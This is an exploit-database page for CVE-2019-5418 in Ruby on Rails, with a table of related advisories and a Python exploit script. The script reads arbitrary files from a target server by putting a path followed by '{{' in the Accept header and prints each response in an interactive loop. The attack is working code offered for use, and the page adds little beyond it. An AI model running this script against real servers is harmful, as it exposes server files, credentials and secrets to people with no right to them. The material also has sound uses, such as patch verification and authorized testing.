Rails 5.2.1 Arbitrary File Content Disclosur
Reporter | Title | Published | Views | Family All 96 |
---|---|---|---|---|
Check Point Advisories | Rails Action View Information Disclosure (CVE-2019-5418) | 29 Jul 202000:00 | – | checkpoint_advisories |
Prion | Design/Logic Flaw | 27 Mar 201914:29 | – | prion |
Metasploit | Ruby On Rails File Content Disclosure ('doubletap') | 28 Mar 201901:13 | – | metasploit |
GithubExploit | Exploit for Vulnerability in Rubyonrails Rails | 19 Nov 201909:40 | – | githubexploit |
GithubExploit | Exploit for Vulnerability in Rubyonrails Rails | 4 Oct 201919:28 | – | githubexploit |
GithubExploit | Exploit for Vulnerability in Rubyonrails Rails | 16 Mar 201911:58 | – | githubexploit |
GithubExploit | Exploit for Vulnerability in Rubyonrails Rails | 23 Mar 201902:52 | – | githubexploit |
Debian CVE | CVE-2019-5418 | 27 Mar 201914:29 | – | debiancve |
AttackerKB | Ruby on Rails 5.2 "DoubleTap" Directory Traversal | 27 Mar 201900:00 | – | attackerkb |
Veracode | Information Disclosure | 14 Mar 201902:43 | – | veracode |
'''
Exploit Title: File Content Disclosure on Rails
Date: CVE disclosed 3/16 today's date is 3/20
Exploit Author: NotoriousRebel
Vendor Homepage: https://rubyonrails.org/
Software Link: https://github.com/rails/rails
Version: Versions Affected: all Fixed Versions: 6.0.0.beta3, 5.2.2.1, 5.1.6.2, 5.0.7.2, 4.2.11.1
Tested on: Rails 5.2.1 (Using ubuntu on linux subsystem for Windows)
CVE: 2019-5418
'''
import sys
try:
import requests
except ImportError:
print('\n\033[93m[!] Requests library not found, please install before proceeding.\n\n \033[0m')
sys.exit(1)
def banner():
banner = """
----------------------------------------------
Arbitrary Traversal exploit for Ruby on Rails
CVE-2019-5418
----------------------------------------------
"""
print(banner)
def check_args():
if len(sys.argv) != 2:
print("Invalid number of arguments entered!")
how_to_use = "python3 Bandit.py url"
print('Use as:', how_to_use)
sys.exit(1)
def check_url(url):
status_code = requests.get(url)
if status_code != 200:
print("Url is invalid or can not be reached!")
sys.exit(1)
def read_file(url, file):
headers = {'Accept': file + '{{'}
req = requests.get(url, headers=headers)
return req
def main():
banner()
check_args()
url = sys.argv[1]
while True:
try:
file = input("Enter file to read (enter quit to exit): ")
except Exception:
file = raw_input("Enter file to read (enter quit to exit): ")
try:
if file.lower() == 'quit':
break
except Exception:
if file == 'quit':
break
response = read_file(url, file)
print(response.text)
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
print('\n\n\033[93m[!] ctrl+c detected from user, quitting.\n\n \033[0m')
# 0day.today [2019-03-24] #
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo